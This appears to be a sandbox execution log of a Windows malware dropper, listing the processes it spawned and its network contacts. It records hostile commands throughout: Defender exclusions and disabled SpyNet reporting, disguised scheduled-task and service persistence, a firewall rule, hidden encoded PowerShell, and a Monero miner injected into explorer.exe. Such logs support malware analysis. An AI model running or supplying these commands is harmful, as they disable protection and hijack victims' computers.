C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe

"C:\Users\Admin\AppData\Local\Temp\fc0ce6a2471e5145519920cdcfcc24c09f1a0d3449c235fa71dcd27fac9c5f60.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat20644077cb3868ccd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat2027462f7d873c4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat2060d0e3bfa5f726.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat20049528047bed.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat20474d8e68c3f86b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat20e3fc574eb.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat20748e484444d9200.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat204ab24d039a58be8.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20049528047bed.exe

Sat20049528047bed.exe

C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20748e484444d9200.exe

Sat20748e484444d9200.exe

C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat204ab24d039a58be8.exe

Sat204ab24d039a58be8.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 5048 -ip 5048

C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20474d8e68c3f86b.exe

Sat20474d8e68c3f86b.exe

C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20e3fc574eb.exe

Sat20e3fc574eb.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5048 -s 556

C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2060d0e3bfa5f726.exe

Sat2060d0e3bfa5f726.exe

C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat2027462f7d873c4.exe

Sat2027462f7d873c4.exe

C:\Users\Admin\AppData\Local\Temp\is-K72FH.tmp\Sat20474d8e68c3f86b.tmp

"C:\Users\Admin\AppData\Local\Temp\is-K72FH.tmp\Sat20474d8e68c3f86b.tmp" /SL5="$9005C,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20474d8e68c3f86b.exe"

C:\Users\Admin\AppData\Local\Temp\7zS40572BC6\Sat20644077cb3868ccd.exe

Sat20644077cb3868ccd.exe

C:\Users\Admin\AppData\Local\Temp\chrome3.exe

"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1172 -ip 1172

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 824

C:\Users\Admin\AppData\Local\Temp\jzhang-game.exe

"C:\Users\Admin\AppData\Local\Temp\jzhang-game.exe"

C:\Users\Admin\AppData\Local\Temp\Pubdate.exe

"C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"

C:\Users\Admin\AppData\Local\Temp\CmdCalc.exe

"C:\Users\Admin\AppData\Local\Temp\CmdCalc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1172 -ip 1172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 792

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 824

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1172 -ip 1172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 836

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 1172 -ip 1172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 884

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 844

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1172 -ip 1172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 816

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1040

C:\Users\Admin\Pictures\Adobe Films\BOuxMRXP_dHO8sZ3wRlHGTzF.exe

"C:\Users\Admin\Pictures\Adobe Films\BOuxMRXP_dHO8sZ3wRlHGTzF.exe"

C:\Users\Admin\Pictures\Adobe Films\nPWwsEgP1gZ8HQ6kl4C42_tx.exe

"C:\Users\Admin\Pictures\Adobe Films\nPWwsEgP1gZ8HQ6kl4C42_tx.exe"

C:\Users\Admin\Pictures\Adobe Films\hVc81UAyx3ob_zfwfBaFesk3.exe

"C:\Users\Admin\Pictures\Adobe Films\hVc81UAyx3ob_zfwfBaFesk3.exe"

C:\Users\Admin\Pictures\Adobe Films\3FrOcX1AbJQcmi5mvBqmmZ83.exe

"C:\Users\Admin\Pictures\Adobe Films\3FrOcX1AbJQcmi5mvBqmmZ83.exe"

C:\Users\Admin\Pictures\Adobe Films\UyTDC8ZfabL_d71ur1ZMAWjB.exe

"C:\Users\Admin\Pictures\Adobe Films\UyTDC8ZfabL_d71ur1ZMAWjB.exe"

C:\Users\Admin\Pictures\Adobe Films\Shw5TK06iKgZOYTsQkCnwxbv.exe

"C:\Users\Admin\Pictures\Adobe Films\Shw5TK06iKgZOYTsQkCnwxbv.exe"

C:\Users\Admin\Pictures\Adobe Films\5D0dcuBXosBkrDZ2NiVgdBGI.exe

"C:\Users\Admin\Pictures\Adobe Films\5D0dcuBXosBkrDZ2NiVgdBGI.exe"

C:\Users\Admin\Pictures\Adobe Films\3WZzJ5dTCbj5mTezMD4IFrOX.exe

"C:\Users\Admin\Pictures\Adobe Films\3WZzJ5dTCbj5mTezMD4IFrOX.exe"

C:\Users\Admin\Pictures\Adobe Films\HhTHp3mt04kvVJx7vm0NlC1H.exe

"C:\Users\Admin\Pictures\Adobe Films\HhTHp3mt04kvVJx7vm0NlC1H.exe"

C:\Users\Admin\Pictures\Adobe Films\HvkGDTvAampfOwnHFnjN1B3M.exe

"C:\Users\Admin\Pictures\Adobe Films\HvkGDTvAampfOwnHFnjN1B3M.exe"

C:\Users\Admin\Pictures\Adobe Films\uRMi6UoSbM6X9YnNOWaQzaEa.exe

"C:\Users\Admin\Pictures\Adobe Films\uRMi6UoSbM6X9YnNOWaQzaEa.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1172 -ip 1172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 1036

C:\Windows\Temp\123.exe

"C:\Windows\Temp\123.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1092

C:\Users\Admin\AppData\Local\Temp\is-KIR5B.tmp\5D0dcuBXosBkrDZ2NiVgdBGI.tmp

"C:\Users\Admin\AppData\Local\Temp\is-KIR5B.tmp\5D0dcuBXosBkrDZ2NiVgdBGI.tmp" /SL5="$2021A,855234,51712,C:\Users\Admin\Pictures\Adobe Films\5D0dcuBXosBkrDZ2NiVgdBGI.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Program Files (x86)\Split Files\KitFiles136.exe

"C:\Program Files (x86)\Split Files\KitFiles136.exe"

C:\Windows\Temp\321.exe

"C:\Windows\Temp\321.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Users\Admin\Pictures\Adobe Films\nPWwsEgP1gZ8HQ6kl4C42_tx.exe

"C:\Users\Admin\Pictures\Adobe Films\nPWwsEgP1gZ8HQ6kl4C42_tx.exe" -h

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 1152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1172 -ip 1172

C:\Users\Admin\AppData\Roaming\{6eb576c0-6208-11ed-9190-806e6f6e6963}\3zz0vsPBG.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3644 -ip 3644

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\Pictures\Adobe Films\HhTHp3mt04kvVJx7vm0NlC1H.exe

"C:\Users\Admin\Pictures\Adobe Films\HhTHp3mt04kvVJx7vm0NlC1H.exe" -h

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 252

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1532

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 1900 -ip 1900

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 1160

C:\Users\Admin\Pictures\Adobe Films\BOuxMRXP_dHO8sZ3wRlHGTzF.exe

"C:\Users\Admin\Pictures\Adobe Films\BOuxMRXP_dHO8sZ3wRlHGTzF.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1172 -ip 1172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1540

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1564 -ip 1564

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\bxmgedut\

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 256

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 1900 -ip 1900

C:\Users\Admin\Documents\9BLuYLAIr5W95O4pP6R5hyzw.exe

"C:\Users\Admin\Documents\9BLuYLAIr5W95O4pP6R5hyzw.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\hbriljmv.exe" C:\Windows\SysWOW64\bxmgedut\

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 1416

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1172 -ip 1172

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\bebra.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1592

C:\Windows\SysWOW64\sc.exe

"C:\Windows\System32\sc.exe" create bxmgedut binPath= "C:\Windows\SysWOW64\bxmgedut\hbriljmv.exe /d\"C:\Users\Admin\Pictures\Adobe Films\Shw5TK06iKgZOYTsQkCnwxbv.exe\"" type= own start= auto DisplayName= "wifi support"

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 2360 -ip 2360

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 892 -ip 892

C:\Windows\SysWOW64\sc.exe

"C:\Windows\System32\sc.exe" description bxmgedut "wifi internet conection"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 892 -s 600

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1172 -ip 1172

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 1588

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2360 -s 608

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1600

C:\Windows\SysWOW64\sc.exe

"C:\Windows\System32\sc.exe" start bxmgedut

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{RiWR-MmVzb-tK2N-mIGJw}\66207056207.exe"

C:\Windows\SysWOW64\bxmgedut\hbriljmv.exe

C:\Windows\SysWOW64\bxmgedut\hbriljmv.exe /d"C:\Users\Admin\Pictures\Adobe Films\Shw5TK06iKgZOYTsQkCnwxbv.exe"

C:\Windows\SysWOW64\netsh.exe

"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{RiWR-MmVzb-tK2N-mIGJw}\60067572108.exe" /mix

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1172 -ip 1172

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{RiWR-MmVzb-tK2N-mIGJw}\39690270368.exe" /mix

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 688 -ip 688

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 688 -s 1044

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1172 -s 1744

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4116 -ip 4116

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4116 -s 760

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 1984

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 1900 -ip 1900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 1608

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "setup.exe" /f

C:\Users\Admin\Pictures\Adobe Films\4X9dWSWmBGkHblEmFClhH8zH.exe

"C:\Users\Admin\Pictures\Adobe Films\4X9dWSWmBGkHblEmFClhH8zH.exe"

C:\Users\Admin\Pictures\Adobe Films\s2XjivwN51fyOeyMo2ClyUF0.exe

"C:\Users\Admin\Pictures\Adobe Films\s2XjivwN51fyOeyMo2ClyUF0.exe"

C:\Users\Admin\Pictures\Adobe Films\_qwRGuZsUu_0fPLJBxrNFKmz.exe

"C:\Users\Admin\Pictures\Adobe Films\_qwRGuZsUu_0fPLJBxrNFKmz.exe"

C:\Users\Admin\Pictures\Adobe Films\72zPrupnUrkMFHfFe2gbP0Vo.exe

"C:\Users\Admin\Pictures\Adobe Films\72zPrupnUrkMFHfFe2gbP0Vo.exe"

C:\Users\Admin\Pictures\Adobe Films\XQDHziNEAgSPFmT6oza10to4.exe

"C:\Users\Admin\Pictures\Adobe Films\XQDHziNEAgSPFmT6oza10to4.exe"

C:\Users\Admin\Pictures\Adobe Films\usJdVBE4X4Hiz2PX4GR_SWci.exe

"C:\Users\Admin\Pictures\Adobe Films\usJdVBE4X4Hiz2PX4GR_SWci.exe"

C:\Users\Admin\Pictures\Adobe Films\Crbl_0YFj85YnxRhcsnSjTOz.exe

"C:\Users\Admin\Pictures\Adobe Films\Crbl_0YFj85YnxRhcsnSjTOz.exe"

C:\Users\Admin\Pictures\Adobe Films\dXe7WiEh2GDlU_HMXti_T8yn.exe

"C:\Users\Admin\Pictures\Adobe Films\dXe7WiEh2GDlU_HMXti_T8yn.exe"

C:\Users\Admin\Pictures\Adobe Films\KnaVDg56ODZxLTmpGgCTtV50.exe

"C:\Users\Admin\Pictures\Adobe Films\KnaVDg56ODZxLTmpGgCTtV50.exe"

C:\Users\Admin\Pictures\Adobe Films\wOdINyiTEz6Sxnss3QFqU_pO.exe

"C:\Users\Admin\Pictures\Adobe Films\wOdINyiTEz6Sxnss3QFqU_pO.exe"

C:\Users\Admin\AppData\Local\Temp\is-EUU12.tmp\_qwRGuZsUu_0fPLJBxrNFKmz.tmp

"C:\Users\Admin\AppData\Local\Temp\is-EUU12.tmp\_qwRGuZsUu_0fPLJBxrNFKmz.tmp" /SL5="$801FA,140518,56832,C:\Users\Admin\Pictures\Adobe Films\_qwRGuZsUu_0fPLJBxrNFKmz.exe"

C:\Users\Admin\AppData\Local\Temp\is-FQQ19.tmp\72zPrupnUrkMFHfFe2gbP0Vo.tmp

"C:\Users\Admin\AppData\Local\Temp\is-FQQ19.tmp\72zPrupnUrkMFHfFe2gbP0Vo.tmp" /SL5="$8024E,855234,51712,C:\Users\Admin\Pictures\Adobe Films\72zPrupnUrkMFHfFe2gbP0Vo.exe"

C:\Windows\SysWOW64\svchost.exe

svchost.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 2260 -ip 2260

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 536

C:\Users\Admin\AppData\Local\Temp\be894f49a9\nbveek.exe

"C:\Users\Admin\AppData\Local\Temp\be894f49a9\nbveek.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 3040 -ip 3040

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3040 -s 1228

C:\Users\Admin\AppData\Local\Temp\is-RP94G.tmp\ty88__.exe

"C:\Users\Admin\AppData\Local\Temp\is-RP94G.tmp\ty88__.exe" /S /UID=95

C:\Users\Admin\AppData\Local\Temp\7zS2759.tmp\Install.exe

.\Install.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\be894f49a9\nbveek.exe" /F

C:\Users\Admin\AppData\Local\Temp\7zS31AA.tmp\Install.exe

.\Install.exe /S /site_id "525403"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\be894f49a9" /P "Admin:N"&&CACLS "..\be894f49a9" /P "Admin:R" /E&&Exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\AppData\Local\Temp\1000001051\portu.exe

"C:\Users\Admin\AppData\Local\Temp\1000001051\portu.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\cacls.exe

CACLS "nbveek.exe" /P "Admin:N"

C:\Users\Admin\AppData\Local\Temp\be894f49a9\nbveek.exe

"C:\Users\Admin\AppData\Local\Temp\be894f49a9\nbveek.exe"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Program Files\Windows Sidebar\DENDKORUTY\poweroff.exe

"C:\Program Files\Windows Sidebar\DENDKORUTY\poweroff.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\16-7c271-d37-69eac-b55962f1aca4d\Rodazhashyma.exe

"C:\Users\Admin\AppData\Local\Temp\16-7c271-d37-69eac-b55962f1aca4d\Rodazhashyma.exe"

C:\Users\Admin\AppData\Local\Temp\17-75fae-de8-8309e-9c8680197f029\Woqipyzhaezhi.exe

"C:\Users\Admin\AppData\Local\Temp\17-75fae-de8-8309e-9c8680197f029\Woqipyzhaezhi.exe"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Users\Admin\AppData\Local\Temp\is-P3HD7.tmp\poweroff.tmp

"C:\Users\Admin\AppData\Local\Temp\is-P3HD7.tmp\poweroff.tmp" /SL5="$10304,490199,350720,C:\Program Files\Windows Sidebar\DENDKORUTY\poweroff.exe" /VERYSILENT

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

C:\Program Files (x86)\powerOff\Power Off.exe

"C:\Program Files (x86)\powerOff\Power Off.exe" -silent -desktopShortcut -programMenu

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe

dw20.exe -x -s 744

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cacls.exe

CACLS "nbveek.exe" /P "Admin:R" /E

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\be894f49a9" /P "Admin:N"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gprRqKChw" /SC once /ST 03:50:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\cacls.exe

CACLS "..\be894f49a9" /P "Admin:R" /E

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gprRqKChw"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.office/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BetGR/pnUtRI9a9x7kTNHhD/AzlqVRzHV746NYfGJ5T" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

C:\Users\Admin\AppData\Local\Temp\be894f49a9\nbveek.exe

"C:\Users\Admin\AppData\Local\Temp\be894f49a9\nbveek.exe"

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 hsiens.xyz udp
N/A 8.8.8.8:53 ip-api.com udp
N/A 208.95.112.1:80 ip-api.com tcp
